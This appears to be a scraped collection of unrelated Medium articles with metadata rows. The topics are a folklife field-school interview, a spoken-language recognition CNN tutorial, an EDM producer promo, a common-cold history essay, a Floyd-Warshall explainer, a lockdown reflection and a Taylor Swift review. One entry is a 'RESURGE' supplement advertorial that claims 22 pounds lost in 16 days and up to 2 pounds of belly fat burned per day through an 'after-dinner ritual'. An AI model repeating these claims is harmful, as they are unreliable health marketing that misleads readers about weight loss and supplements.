MS: Since you’ve brought up teaching, let’s shift the conversation to the AFC and its educational mission to train people in ethnographic methods and cultural documentation.
GS: The longer story is that it’s written in the DNA of the Center’s mission, which is to provide opportunities for the expression of folklife, cultural traditions, and to provide opportunities for folklorists and others to document, present, and represent their communities. So, documentation has always been a part of it. For instance, the field surveys [mentioned earlier] go back to the early days of AFC documenting, in an interdisciplinary fashion, cultural traditions from around the world. And it’s one of the seminal efforts of the Center: To train people in ethnographic documentation methods and also sustain that cultural record by providing descriptions, a template for people who are not well-versed in librarianship principles and archiving, to enter into that field with some degree of confidence, and to train people to do that. So, Carl Fleischauer, Elena Bradunas, Peter Bartis, and others, set that standard over 40 years ago.
I think the concept of [AFC] field schools was raised during an early, 1980s AFC Board meeting, when the question Would the Center undertake training in documentation? was posed. It was felt at the university level that folklorists were going out in the field with no training, formal or otherwise, in field documentation. Thanks to David Taylor’s work as the main organizer of the field schools, they started out as partnerships between the AFC and an institution of higher learning, and remain so for the most part today. So, the first few years it was Indiana University for two field schools…our colleague Howard Sachs at Kenyon College in Gambier, Ohio, did one field school…and Mario Montaño did field schools at the University of Colorado and University of New Mexico over the course of two summers. Many others have participated since then including the latest one in 2018 with the University of Wyoming and Utah State University. They not only trained students, but also academy-based folklorists themselves, in field methodologies in an experiential setting. I should add that about ten years ago we used the field school model to provide documentary training to Indigenous people, the Laikipia Maasai of Kenya and Rastafari and Maroon communities in Jamaica, in partnership with the World Intellectual Property Organization (WIPO). And presently, the AFC provides skills-based methods training for North American Indigenous community scholars through collaborations with the Sustainable Heritage Network, out of Washington State University.
MS: If I may interrupt–for those who may not know, what is a field school?
GS: Well, the [AFC] field school in cultural documentation is about teaching a comprehensive set of [ethnographic] methods including technical training in various aspects of field documentation. Let me put it this way: Basically, the field school is an intensive ethnographic boot camp for three weeks. Classroom instruction is for about two weeks, which entails hands-on instruction where we take students out for two, four, six hours a day, teaching them how to turn the recorder on and off, manipulate the controls and so on. Quite literally, we shove the tape recorder into their hands and say Here’s your field kit, here’s what you’ve got in here, now I want you to do a five-minute interview and tell me all that you did and didn’t do, and then we’ll listen to it. So, from the very beginning there’s this notion of pushing people into the deep end, having them learn things they didn’t know, and unlearn things they thought they knew in terms of technical set-up. So, you have people teaching audio recording techniques using, as you are, a digital recorder…back in the day, it was a cassette recorder and before that…not quite a hand-crank Victrola, which is the gesture you are making with your hands right now [laughter]…but all of that combined with, say, photography. (As an aside: when I began teaching in the field schools in 2004, we were still doing photography with single-lens reflex, analog cameras…we still have a bunch of them sitting up in the stacks somewhere, which all went away almost as soon as the digital age hit.)
And during the field school, you’re taking them through the process of a fieldwork project, which has been determined by the instructor at the university and the AFC. So, when we worked with researchers at Utah State University (USU), we [AFC] say [to the instructor], How does this help you with your research on refugee communities in Cache Valley, Utah? This is because the university researcher/instructor has already built rapport and trust with community members who will be interviewed by students during the field school. So, instructors Randy Williams and Lisa Gabbert worked with folklorist Nelda Ault to get together members of three distinct resettled, refugee communities and to bring them into the school environment. The instructors’ goal was to also demystify the school itself and try to get the children of refugees to start thinking of USU as a place where they are welcome. And one way to do that was to involve the communities in the documentation efforts and to say to them, Now that you’re here in Utah, what are some of the things that you would like to document about your community’s traditions?
Going back to an earlier concept you brought up, how involved is the community in shaping their own representation? That’s a big part of these field school projects. We rely on these community members to be our interlocutors, guiding us through their cultural concepts and how they represent themselves as cultural beings in this new setting [e.g., Utah]. And, in an ideal sense, the things you look for when putting together a field school is, first and foremost, buy-in from the community. Who is going to be doing the work on the ground? The students and the instructors. And then we [AFC] come in (after already working with the instructors to shape the field school program) to teach alongside the university instructors.
MS: So, getting a little narrower in focus, what are the key elements, or ingredients, in teaching the art of the interview to field school participants?
GS: There is a list of 24 tips for doing a guided interview that we give to the students. They’re tips and guidelines, not that you need to do them in order, but they need to be taken into account as a whole. For instance, what you just did: “stamping” that it’s March 26 on the recording…
MS: And I’ll ask for your consent at the end!
GS: That’s right, because you didn’t ask for my consent at the beginning [which is recommended].*
Source: https://medium.com/communityworksjournal/its-about-the-stories-that-people-are-willing-to-tell-you-an-interview-with-guha-shankar-56f0ac09a216 (Joe Brooks, 2019-11-03)
Spoken Language Recognition Using Convolutional Neural Networks
Automatically identify the spoken language from a speech audio signal with TensorFlow
Introduction
Applications
At Fraunhofer IAIS, we work on various speech technologies such as automatic speech recognition, speaker recognition, etc. In recent work, I developed a new service predicting the spoken language directly from the audio stream. If the language is known, a suitable model for the speech recognition step can be selected automatically. Potential applications for this can be automatic transcription software and conversational AI.
Open-Source Code
I have prepared a GitHub repository including Jupyter Notebooks that can be used to experiment with and train your own spoken language recognizer. In its current state, it is capable of distinguishing between German and English; you can take it as a starting point for implementing your own recognizer. We mainly use Python 3, TensorFlow 2, and librosa.
Approach
The concept is based on publications by Bartz et al. [1] and Sarthak et al. [2], who use convolutional neural networks (CNNs) to implement spoken language identification systems. The idea is to classify a short audio segment containing a speech signal by analyzing its spectrogram with a large CNN. We use the Mel-scaled spectrogram, similar to Pröve [4].
Results
The open-source variant of my language recognition based on Common Voice data yields an accuracy of 93.8 % classifying English and German. At our institute, we are using our own media datasets and obtain an overall accuracy of 98.2 % with the same code tested on 152 h of augmented testing data. Our algorithm can distinguish between English, German, and “other” (unknown class).
Dataset
The dataset used in the notebooks is based on Mozilla’s Common Voice. You will need to download the English and the German datasets and then run the scripts from the first notebook to extract a training and an evaluation dataset containing speech signals with a duration between 7.5 and 10 seconds.
Data Augmentation
The training dataset can be augmented by adding noise. This will later help improve the robustness of the final model against noise-affected recordings. We use the NumPy function numpy.random.normal to draw from a normal (Gaussian) distribution, which gives us white noise.
import numpy

def add_noise(audio_segment, gain):
    num_samples = audio_segment.shape[0]
    noise = gain * numpy.random.normal(size=num_samples)
    return audio_segment + noise
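The notebook calls add_noise with a fixed gain. One way to choose that gain — purely illustrative and not part of the original code — is to derive it from a target signal-to-noise ratio (SNR): unit-variance white noise has power 1, so the gain is simply the square root of the desired noise power.

```python
import math
import random

def gain_for_snr(audio_segment, snr_db):
    # Mean power of the clean signal
    signal_power = sum(x * x for x in audio_segment) / len(audio_segment)
    # Unit-variance white noise has power 1.0, so scaling it by `gain`
    # yields noise power gain**2; solve for the target SNR in dB.
    noise_power = signal_power / (10 ** (snr_db / 10))
    return math.sqrt(noise_power)

# Toy example: a 1 kHz sine sampled at 8 kHz, noise 20 dB below the signal
signal = [math.sin(2 * math.pi * 1000 * n / 8000) for n in range(8000)]
gain = gain_for_snr(signal, snr_db=20)
noisy = [s + gain * random.normalvariate(0, 1) for s in signal]
```

A unit-amplitude sine has power 0.5, so a 20 dB SNR yields a gain of about 0.071 here.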
Data Preprocessing
All audio files are preprocessed to extract a Mel-scaled spectrogram. This is done with the following steps.
Fig 1: Data preprocessing from speech audio to the spectrogram | Image by author
Loading the Audio File
In this step, the audio is loaded and downsampled to 8 kHz to limit the bandwidth to 4 kHz. This helps to make the algorithm robust against noise in the higher frequencies. As stated in [1], most of the phonemes in the English language do not exceed 3 kHz.
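librosa performs the resampling internally when loading the file. As a framework-free illustration of what downsampling to 8 kHz means (this naive sketch skips the anti-aliasing low-pass filter a real resampler applies first):

```python
def decimate(samples, factor):
    # Keep every `factor`-th sample. Note: a proper resampler low-pass
    # filters first to prevent aliasing; this only shows the rate change.
    return samples[::factor]

audio_16k = [0.0] * 16000          # one second of audio at 16 kHz
audio_8k = decimate(audio_16k, 2)  # the same second at 8 kHz
```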
Fixing the Duration to 10 Seconds
def fix_audio_segment_to_10_seconds(audio_segment):
target_len = 10 * sample_rate
audio_segment = numpy.concatenate([audio_segment]*2, axis=0)
audio_segment = audio_segment[0:target_len]
return audio_segment
We duplicate the signal that is between 7.5 and 10 seconds long and cut it to 10 seconds.
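Why duplicating once is enough: every clip is at least 7.5 seconds long, so one duplication yields at least 15 seconds, which is then trimmed to exactly 10 seconds. A plain list-based sketch of the same logic, assuming the 8 kHz sample rate used above:

```python
sample_rate = 8000

def fix_to_10_seconds(samples):
    target_len = 10 * sample_rate
    samples = samples * 2        # 7.5 s or more becomes 15 s or more
    return samples[:target_len]  # trim back to exactly 10 s

clip = [0.0] * int(7.5 * sample_rate)   # shortest allowed clip
fixed = fix_to_10_seconds(clip)
```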
Mel-scaled Spectrogram
The Mel-scaled spectrogram is computed from the audio. It helps the neural network analyze the relevant speech frequencies: the Mel scale represents lower frequencies with a higher resolution than higher frequencies, reflecting the way humans perceive pitch.
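A common formula behind this scaling (the HTK variant; librosa also offers the Slaney variant) maps a frequency f in Hz to Mels as m = 2595 · log10(1 + f/700), which compresses the higher frequencies:

```python
import math

def hz_to_mel(f_hz):
    # HTK-style Mel formula
    return 2595.0 * math.log10(1.0 + f_hz / 700.0)

# The band from 0 to 1 kHz spans more Mels (finer resolution) than
# the equally wide band from 3 to 4 kHz.
low_band = hz_to_mel(1000) - hz_to_mel(0)
high_band = hz_to_mel(4000) - hz_to_mel(3000)
```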
import librosa
import numpy

def spectrogram(audio_segment):
    # Compute Mel-scaled spectrogram image
    hl = audio_segment.shape[0] // image_width
    spec = librosa.feature.melspectrogram(audio_segment,
                                          n_mels=image_height,
                                          hop_length=int(hl))
    # Logarithmic amplitudes
    image = librosa.core.power_to_db(spec)
    # Convert to numpy matrix
    image_np = numpy.asmatrix(image)
    # Normalize and scale
    image_np_scaled_temp = (image_np - numpy.min(image_np))
    image_np_scaled = image_np_scaled_temp / numpy.max(image_np_scaled_temp)
    return image_np_scaled[:, 0:image_width]
Normalization takes place to adjust the values in the spectrogram between 0 and 1. This step equalizes quiet and loud recordings to a common level.
Conversion to PNG
All files are finally stored as PNG files of size 500 x 128, but first, the normalized spectrograms need to be converted from decimal values between 0 and 1 to integer values between 0 and 255.
def to_integer(image_float):
# range (0,1) -> (0,255)
image_float_255 = image_float * 255.0
# Convert to uint8 in range [0:255]
image_int = image_float_255.astype(numpy.uint8)
return image_int
Fig 2: A Mel-scaled spectrogram of speech | Image by the author
Model Training
Accessing the Datasets
To make the datasets accessible for the model training algorithm, we first need to instantiate generators that iterate over the datasets in a memory-efficient way. This is important because we have 60,000 images across the training and evaluation data and cannot simply load them all into memory. Fortunately, Keras, which is part of TensorFlow, has excellent utilities for handling image datasets. I am using the ImageDataGenerator as the data input source for the model training.
from tensorflow.keras.preprocessing.image import ImageDataGenerator

image_data_generator = ImageDataGenerator(
    rescale=1./255,
    validation_split=validation_split)

train_generator = image_data_generator.flow_from_directory(
    train_path,
    batch_size=batch_size,
    class_mode='categorical',
    target_size=(image_height, image_width),
    color_mode='grayscale',
    subset='training')

validation_generator = image_data_generator.flow_from_directory(
    train_path,
    batch_size=batch_size,
    class_mode='categorical',
    target_size=(image_height, image_width),
    color_mode='grayscale',
    subset='validation')
A suitable batch size is 128, which is large enough to help reduce overfitting while keeping the model training efficient.
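With generators, the number of steps per epoch follows directly from the dataset size and the batch size. The concrete numbers below are my own illustration (assuming 60,000 training images and a 10 % validation split), not figures from the article:

```python
import math

total_images = 60000
validation_split = 0.1
batch_size = 128

train_images = int(total_images * (1 - validation_split))         # 54,000
steps_per_epoch = math.ceil(train_images / batch_size)            # 422
validation_steps = math.ceil((total_images - train_images) / batch_size)
```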
Model Definition Inception V3
As suggested in [1], a large CNN such as Inception V3 is well suited to this task. Spoken language recognition is a very complex task that demands a model with high capacity; smaller networks perform worse because they cannot capture the complexity of the data.
The original Inception V3 model [3], which is readily available from Keras Applications, must be slightly adapted to process our dataset: it expects images with three color channels, but our images are grayscale. The following lines of code copy the single grayscale channel to all three channels of the Inception V3 input tensor.
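The Keras code for this step did not survive the page extraction; in Keras one would typically wrap the duplication in a Lambda or Concatenate layer over three copies of the single-channel input. A framework-free sketch of the channel duplication itself:

```python
def gray_to_rgb(image):
    # image: 2-D nested list (H x W) of grayscale values in [0, 1];
    # returns an H x W x 3 structure with the value copied per channel.
    return [[[px, px, px] for px in row] for row in image]

img = [[0.1, 0.5],
       [0.9, 0.0]]
rgb = gray_to_rgb(img)
```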
The model has nearly 22 million parameters.
Compiling the Model
In my evaluations, the RMSprop optimizer yielded good results; Adam is suggested in [1].
Early Stopping
Training can be sped up by stopping automatically when the learning plateaus. I use Keras's EarlyStopping callback to do so.
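The callback's core logic — shown here as a plain-Python sketch, not the Keras implementation — tracks the best validation loss seen so far and stops after `patience` epochs without improvement:

```python
def stop_epoch(val_losses, patience=3):
    # Return the epoch index at which early stopping would halt training.
    best = float("inf")
    wait = 0
    for epoch, loss in enumerate(val_losses):
        if loss < best:
            best, wait = loss, 0
        else:
            wait += 1
            if wait >= patience:
                return epoch
    return len(val_losses) - 1

losses = [1.0, 0.8, 0.7, 0.71, 0.72, 0.73, 0.74]
halted_at = stop_epoch(losses)   # no improvement after epoch 2
```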
Learning Rate Decay
As suggested in [1], I implemented an exponential learning rate decay.
import math

from tensorflow.keras.callbacks import LearningRateScheduler

def step_decay(epoch, lr):
    drop = 0.94
    epochs_drop = 2.0
    lrate = lr * math.pow(drop, math.floor((1+epoch)/epochs_drop))
    return lrate

learning_rate_decay = LearningRateScheduler(step_decay, verbose=1)
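Because LearningRateScheduler feeds the current learning rate back into step_decay each epoch, the decay compounds over time. Simulating a few epochs with an assumed initial rate of 0.001 (my value, not from the article):

```python
import math

def step_decay(epoch, lr):
    drop = 0.94
    epochs_drop = 2.0
    return lr * math.pow(drop, math.floor((1 + epoch) / epochs_drop))

# Simulate how the scheduler applies the decay epoch by epoch
lr = 0.001
schedule = []
for epoch in range(4):
    lr = step_decay(epoch, lr)
    schedule.append(lr)
# Epoch 0 leaves the rate unchanged; afterwards it shrinks each epoch.
```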
Training
Now, the actual training takes place using the following command.
model.fit(train_generator,
validation_data=validation_generator,
epochs=60,
steps_per_epoch=steps_per_epoch,
validation_steps=validation_steps,
callbacks=[early_stopping, learning_rate_decay])
The maximum number of epochs is set very high, but since I am using early stopping, training fortunately ends after 36 epochs.
Fig 3: Training and evaluation accuracies | Image by the author
When looking at the training and evaluation accuracies over the 36 epochs, we can see that overfitting is involved: the model classifies the training dataset much more accurately than the evaluation dataset. This is because the Inception V3 model is huge and has an enormous capacity. Using such a big network means that the amount of diverse training data should be very large as well. To overcome this issue, you can increase the amount of training data up to the point where overfitting no longer occurs. In the plot, you can also see the effect of the learning rate decay: the steepest learning curve appears during the first 10 epochs.
Evaluation
Finally, I instantiate a new ImageDataGenerator for the testing data and use
_, test_accuracy = model.evaluate(evaluation_generator,
steps=evaluation_steps)
to evaluate the model. The result is a testing accuracy of 93.8 %.
Adapting and Improving the Model
Feel free to use the code to improve the model. For example, you can add more classes and feed it with more data from other languages. Also, it is recommended to adapt the data and the augmentation to your application. We at Fraunhofer have an optimized version trained on media data. We are using two additional augmentation steps to improve results on double-talk (overdub) and background music. You can also alter pitch and speed to perform data augmentation. Moreover, it is recommended to use much more data. If the amount and diversity of the training dataset is not sufficient, overfitting might occur.
Summary
I have introduced my open-source code on GitHub and the implemented approach for identifying the spoken language directly from speech audio. The model accuracy is 93.8 % for the given datasets based on Common Voice. The idea is to analyze the Mel-scaled spectrogram of a 10-second-long audio segment using a CNN with a high capacity. Since language recognition is a complex task, the network needs to be large enough to capture the complexity and derive meaningful features during training. I suggest further improving the model by extending the dataset and the augmentation techniques. Then, testing accuracies above 98 % are possible without changing the training implementation itself.
References
[1] C. Bartz, T. Herold, H. Yang and C. Meinel, Language Identification Using Deep Convolutional Recurrent Neural Networks (2015), Proc. of International Conference on Neural Information Processing (ICONIP)
[2] S. S. Sarthak, G. Mittal, Spoken Language Identification using ConvNets (2019), Ambient Intelligence, vol. 11912, Springer Nature 2019, p. 252
[3] C. Szegedy, V. Vanhoucke, S. Ioffe, J. Shlens and Z. Wojna, Rethinking the Inception Architecture for Computer Vision (2015), CoRR, abs/1512.00567
[4] P.-L. Pröve, Spoken Language Recognition (2017), GitHub Repository
|
https://medium.com/towards-artificial-intelligence/spoken-language-recognition-using-convolutional-neural-networks-6aec5963eb18
|
['Joscha Simon Rieber']
|
2020-12-17 01:02:16.554000+00:00
|
['Deep Learning', 'Language', 'Speech', 'Audio', 'NLP']
|
French EDM Music Producer Damien Ranners Eyeing U.S. Artist Collaborations
|
Paris, France
Currently based in Paris, France, Parisian music producer Damien Ranners is taking his talents to the U.S. market as a collaborator with talented U.S.-based singers who, like him, are mostly inspired by EDM.
Ranners describes his signature producing style as progressive melodic house, with a pinch of Trap, and a wide background of electro R&B and hip-hop as well.
In the early 2000s, Ranners was active as a musician on the French hip-hop, R&B, and reggaeton scene, working with French producers and UK artists like Karl Williams, Suzanne Thomas, Mariano, Berny Craze, Menelik, and more. Also talented in TV production, his voice and music design are well known in advertising circles.
“French EDM Music Producer Damien Ranners is creative, comical crazy cool and his beats are fire.” Faith Willows, Miami Patch National Freelance Arts & Entertainment Writer.
Ranners is searching for talented EDM artists in the U.S. who want to collaborate and take their careers to the next level. Check out his latest videos to get a snapshot of his musical world and get a feel for his style.
To learn more about Damien Ranners visit his website or connect with him on social media @damienranners.
|
https://medium.com/@shegotgamemedia/french-edm-music-producer-damien-ranners-eyeing-u-s-artist-collaborations-d6840438eeeb
|
['She Got Game']
|
2020-12-21 18:23:56.516000+00:00
|
['Collaboration', 'EDM', 'French', 'Producer', 'Paris']
|
RESURGE
|
Weight Loss Tip From 48 Year Old Mom Who Lost 60 Pounds in 5 Months
Losing weight can take a lot of time, discipline and sometimes a lot of sweat.
There are however a lot of simpler ways to see your pounds and inches drop on the scale and in your waist without having to do HITT workouts three times a week, counting calories, or restricting yourself to a water-only diet.
So, if you don’t want to feel like your world’s falling apart just to lose weight, here are 12 little tricks that you should incorporate daily into your routine that will help you lose weight.
If you’re consistent enough, it can even lead you to losing up to 20 pounds in a matter of 2 weeks, just like it did for my 48 year old friend, Margaret. She safely lost 60 pounds in 5 months and shared her top 12 weight loss tips.
And the best part of all this is — there is no gym or diet required.
Click here to see the 2-minute “after-dinner ritual” that helped me melt away 22 pounds in just 16 days.
Let’s get started.
1. Always start a meal with a glass of water
2. Make a few simple swaps at every meal
3. Have a piece of dark chocolate for dessert
4. Be diligent with portion control
5. Move more
6. Don’t drink your calories
7. Don’t starve yourself
8. Snack on high-protein, high-fiber foods
9. Steer clear of simple carbohydrates
10. Eat a light, early dinner
11. Get longer, more consistent sleep
12. Keep a journal
GET RESURGE DEEP SLEEP AND HGH SUPPORT FORMULA NOW
One last thing… you should try this 2-minute “after-dinner ritual” that burns up to 2 pounds of belly fat per day…
“All this by a 2-minute “after-dinner ritual?” I asked.
I met an old friend for lunch last month and I was super impressed with how good she looked.
She said, “It’s not so much about the “after-dinner ritual”, but more about how it gives you a regenerative form of deep sleep that is responsible for everything we need to dramatically increase our fat burning metabolism and improve our health and appearance.”
Even though I was skeptical, I’ve been struggling with my weight over the last few years, so I gave it a shot and watched the same video she did.
Well, it’s only a couple weeks later and you know what they say about how “you can’t transform your body overnight”…
They’re right — it actually took me 16 days to lose 22 pounds.
Now it’s my girlfriends asking ME what I’M doing differently 💅
Imagine your body being beach ready before Memorial Day.
Imagine enjoying the foods you love: pasta, wine, or even a dessert — completely guilt-free.
And imagine feeling good and living your life without obsessing about every single calorie you eat…
All while knowing your health is being protected by one of the most powerful natural healing rituals ever discovered.
Click here to see the 2-minute “after-dinner ritual” that helped me melt away 22 pounds in just 16 days.
|
https://medium.com/@weightlosswithmenow/resurge-62f3e8dd7be0
|
[]
|
2020-11-16 15:45:03.170000+00:00
|
['Weight Loss', 'Weightloss Foods', 'Weightloss Recipe', 'Weight Loss Tips']
|
Common Cold. We’ve been catching it since time…
|
Common Cold
Have you ever had a cold? I certainly have. In fact, I have one right now, even though you (obviously) can’t tell.
I’ve had the common cold a lot: I have what seems like a particularly gullible respiratory system, and my immune system is by turns both lacking and strangely overprotective. I have it so much, my mother likes to joke that I get it only twice a year, but that it stays for six months each time.
So I think I’m somewhat qualified to say that common cold and I have a special relationship. I even kind of like it — at least compared to some of the other stuff I’ve had over the years like viral flus, pneumonia, and chicken pox.
The common cold is almost a reliable old friend at this point.
But it really shouldn’t be.
When you read my last statement, you probably didn’t even blink. (I mean, you probably did blink, but I’m speaking metaphorically, here.) And why should you?
Plenty of people get colds, and plenty of people get colds all the time. There’s nothing unusual about me.
But what is unusual is the fact that I’m not unusual. If you think about how far human science and medicine have come in the last half-century, the fact that I catch colds all the time should be unusual.
We have vaccines for chicken pox, tetanus, rabies, and perhaps most successfully, polio. Even the flu, which shifts and mutates as often as once a year — most notably in 2009, when we saw the first cases of H1N1 flu— has a vaccine.
So, I ask the question again: why am I still catching a cold twice a year?
Perhaps the most misleading thing about the common cold is its name. The word ‘common’ implies something lowly, but, more importantly, it also implies something singular.
It couldn’t be more wrong.
The ‘common cold’ is really not common at all. Chances are, each cold I catch is entirely different from the ones I’ve caught before.
Colds are caused by any one of over two hundred viruses, belonging to one of seven families. The one thing that all these viruses have in common is the way they make you feel: the sore throat, the runny nose, the dull headache. That is to say, their common function is to attack cells in your respiratory (breathing) system.
The actual ways in which they go about doing this are all very different, so discovering one universal cure becomes much harder, if not impossible.
People have been trying to cure the cold for a long time.
The first attempt was in 1953, by an epidemiologist named Winston Prince. His interest was piqued when a handful of the nurses who worked with him all fell sick at the same time. He took samples from them and grew the culture in his lab, narrowing down to a virus known as a ‘rhinovirus’.
(The word ‘rhino’ is Greek for ‘nose’, and the reason you’re thinking of a thick-skinned grassland beast instead is that its full name, rhinoceros, refers to the ‘ceros’ or horn on its nose).
Winston Prince developed a vaccine for this virus, based on the principle that the body will create antibodies for any virus — dead or alive — that it encounters. He injected several hundred people with dead rhinovirus, then found that, on following up, they had significantly fewer colds than the rest of the population. He wrote a paper in 1957 describing his success, and in it, he named the strain ‘JH’ after Johns Hopkins — the university where he was working at the time.
Before long, however, other clinical trials came out. These new trials showed that the vaccine had little to no effect, suggesting there might be other strains around.
There were.
Over the course of the ’60s and ’70s, scientists steadily discovered more and more viruses. They found more families, apart from the rhinovirus— coronavirus, influenza and parainfluenza virus, adenovirus, respiratory syncytial virus, and metapneumovirus.
They found that, even within the rhinovirus, there were more than 160 separate strains, each needing a different vaccine. Injecting people with 160 different vaccinations each was always going to be impractical.
Scientists gave up on trying to cure the common cold. The last clinical trial was in 1975.
While rhinoviruses are different from one another, they’re also not. They all look like pom-poms under a microscope; they’re all, as Nobel Prize-winning biologist Peter Medawar called them, “a piece of bad news wrapped in a protein coat”.
And it is the coat — the protein — that makes all the difference. Each strain has a slightly different composition of the proteins that make up its exterior, so the body and white blood cells don’t recognise a new one until it’s too late.
But, some scientists asked, just because the coats are a little different, does that mean that they are nothing alike?
That’s exactly the question Sebastian Johnston was asking when he took a second look at the rhinovirus. While an asthma specialist by trade, he did some work in the “Common Cold Unit” at Imperial College in London during his PhD years and was fascinated by the cold.
Johnston wondered if he might be able to isolate some structure that was common to all strains of rhinovirus, and then develop a vaccine based on that. It wasn’t an entirely novel idea: something similar had been done with the polio vaccine as well.
He approached Jeffrey Almond, newly-appointed head of vaccine development at the giant pharma company Sanofi Pasteur. Almond was interested, and the vaccine was further looked into. The team had some success with isolating a protein that was ‘on’ many of the serotypes (strains) of rhinovirus.
However, a series of unfortunate events led to the testing grinding to a halt in 2013. There was a change in management at the company, and Almond retired. Johnston’s vaccine had nowhere to go: Imperial College couldn’t itself fund the research.
But the moral of Johnston’s story is this: maybe there is hope. Maybe, just maybe, we may still be able to create a vaccine for the common cold. And maybe, just maybe, I can catch it just once a year instead of twice.
Other research has been done in recent years. Prominently, Martin Moore in Atlanta is revisiting the supposed impracticality of 160 vaccines; he thinks he might be able to combine them into a cocktail of sorts.
But we also have to think about the practicality of having a cold vaccine at all. To start with, big pharma companies, don’t like vaccines in general: they take years to develop, have to be sold for less, and more often than not, don’t even end up working.
In this case, it’s not clear whether anyone would use the vaccine, even if it came on the market. Most people who could afford the vaccine would generally be pretty healthy too. They’d get over the cold in the span of a few days, so why bother preventing it?
As for those who can’t afford the vaccine, they likely have bigger things to worry about. And by the time anyone, rich or poor, takes themselves to a doctor, it’s too late for the vaccine anyway. So that rules out most of the potential buyers.
Of course, it still leaves me.
Want to write with us? To diversify our content, we’re looking out for new authors to write at Snipette. That means you! Aspiring writers: we’ll help you shape your piece. Established writers: Click here to get started.
|
https://medium.com/snipette/comon-cold-502ee8159675
|
['Manasa Kashi']
|
2019-02-22 07:01:02.159000+00:00
|
['Health', 'Vaccines', 'History', 'Virus', 'Medicine']
|
Life in the Lockdown
|
How are you doing?
What’s life been like amidst the lockdown? Varied experiences, shaped by people’s own circumstances, have led to vastly different outcomes. What has each one of us learnt from the predicaments that life has thrown at us?
The lockdown has, for some, been a time of immense learning and self-discovery. There have been bakers, chefs, artists — skillsets that had lain dormant for so long finally finding an outlet, with wonderful results. At the same time, life hasn’t been so kind to everybody — jobs and livelihoods have been lost on the financial front; but graver still are the innumerable lives that have been taken from us.
Have you wondered — apart from all of these statistics on deaths and positive cases — what it is like to be someone else? Have you put yourself into another’s shoes to look at life through their eyes — their hopes and dreams and all of their memories? Life in its transience moves on — people forget; but to the ones that you mean the world to, life stands still. Can we as a species imagine the collective grief that we are going through right now? We all seem so preoccupied with bringing our lives to a semblance of normalcy that this might often be skipped amidst the priorities that our work imposes on us. But what is more important — what could be more important — than knowing our own friends and neighbors?
Do we really know them? Can we unmask the social façade that our lives are built on? And truly ask — how are you doing? Would they answer? With those questions, I’ll leave you to ponder this coming week. Think it over, and truly ponder in moments of solitude your own well-being, both physical and mental.
|
https://medium.com/@krusna/life-in-the-lockdown-7be75f71dbbd
|
['Navaneethkrishnan Nambiar']
|
2020-12-06 20:14:34.125000+00:00
|
['Questions', 'Social', 'Wellness', 'Life', 'Lockdown']
|
The Floyd Warshall Algorithm
|
The problem is to find the shortest distances between every pair of vertices in a given edge-weighted directed graph. The graph is represented as an adjacency matrix, whose entries denote the weight of each edge (if it exists) or INF (1e7) otherwise.
Input:
The first line of input contains an integer T denoting the no of test cases. Then T test cases follow. The first line of each test case contains an integer V denoting the size of the adjacency matrix. The next V lines contain V space-separated values of the matrix (graph). All input will be an integer type.
Output:
For each test, case output will be V*V space-separated integers where the i-jth integer denotes the shortest distance of the ith vertex from the jth vertex. For INT_MAX integers output INF.
This problem has been previously asked in Samsung.
The Floyd Warshall algorithm, also known as the All-Pairs Shortest Path algorithm, finds, for all the vertices, the minimum cost of going from any one vertex to any other vertex. We do this by checking whether there is a path via a particular vertex between two vertices such that the cost of going via that path is smaller than the current cost of going from one vertex to the other.
For example -
Suppose there are two vertices A and C, and the cost of going from one to the other is 10. Now let there be another vertex B, such that the cost of going from A to B is 2 and from B to C is 3. The net cost of going from A to C via B thus equals 5, which is smaller, so we update the current cost of going from A to C to 5.
Formula for Floyd Warshall Algorithm — if M[a][c] > (M[a][b] + M[b][c]) then M[a][c] = M[a][b] + M[b][c].
The Time Complexity of Floyd Warshall Algorithm is O(n³).
A point to note here is, Floyd Warshall Algorithm does not work for graphs in which there is a negative cycle. In this case, we can use the Bellman-Ford Algorithm, to solve our problem.
The below-given solution is in C programming language.
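As a minimal sketch of the solution (written here in Python for readability; the triple loop maps line-for-line onto the C version), reusing the A-B-C example from above:

```python
INF = int(1e7)  # stands in for "no edge", as in the problem statement

def floyd_warshall(matrix):
    """All-pairs shortest distances on an adjacency matrix."""
    n = len(matrix)
    dist = [row[:] for row in matrix]  # don't mutate the input
    for b in range(n):            # intermediate vertex
        for a in range(n):        # source
            for c in range(n):    # destination
                if dist[a][b] + dist[b][c] < dist[a][c]:
                    dist[a][c] = dist[a][b] + dist[b][c]
    return dist

# The A-B-C example from above: A->C costs 10 directly, but only 2 + 3 via B.
graph = [
    [0,   2,   10],
    [INF, 0,   3],
    [INF, INF, 0],
]
result = floyd_warshall(graph)
```

In C, take care that `INF + INF` does not overflow an `int`; a common trick is to skip the relaxation when either `dist[a][b]` or `dist[b][c]` is INF.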
|
https://medium.com/@srajaninnov/the-floyd-warshall-algorithm-b1ef91395115
|
['Srajan Gupta']
|
2020-07-01 09:05:35.729000+00:00
|
['Dynamic Programming', 'Graphs', 'Samsung', 'Adjacency Matrix', 'Floyd Warshall']
|
Folklore- Taylor Swift Album Review
|
Folklore- Taylor Swift Album Review
The pop superstar pivots once more to the most quiet and intimate release of her long career, for what is ultimately a mixed bag.
In 2020, the concert halls, clubs, and stadiums that are usually filled with screaming fans and touring artists sit empty, collecting dust. But the pause on tradition hasn’t stopped some of the biggest artists in music from releasing original material. Now it seems that the isolation of our new abnormal has inspired the biggest pop star on the planet to pivot entirely once again, in a poetic reversal, from pop star to indie singer-songwriter. Folklore marks Taylor Swift’s eighth studio album to date and an all-new direction for her as an artist. The understated rollout fits nicely beside her quietest and most intimate musical release in years, maybe ever.
The title, folklore, and the coppiced album cover had me excited to hear what looked to be a true blue indie record. For the most part that is exactly what Taylor has delivered on folklore, and I do feel that her change in artistic direction is for the best. I have always held the opinion that while she is a gifted songwriter, her pop sensibilities don’t measure up to her contemporaries. Even the best T-Swift pop record can’t compete with the likes of Carly Rae Jepsen, Charli XCX, or a whole crop of newcomers like Rina Sawayama or Dua Lipa. So now having departed from her traditional sound once more I do think I can say that folklore, while not without its faults, is Taylor Swift’s best album in years.
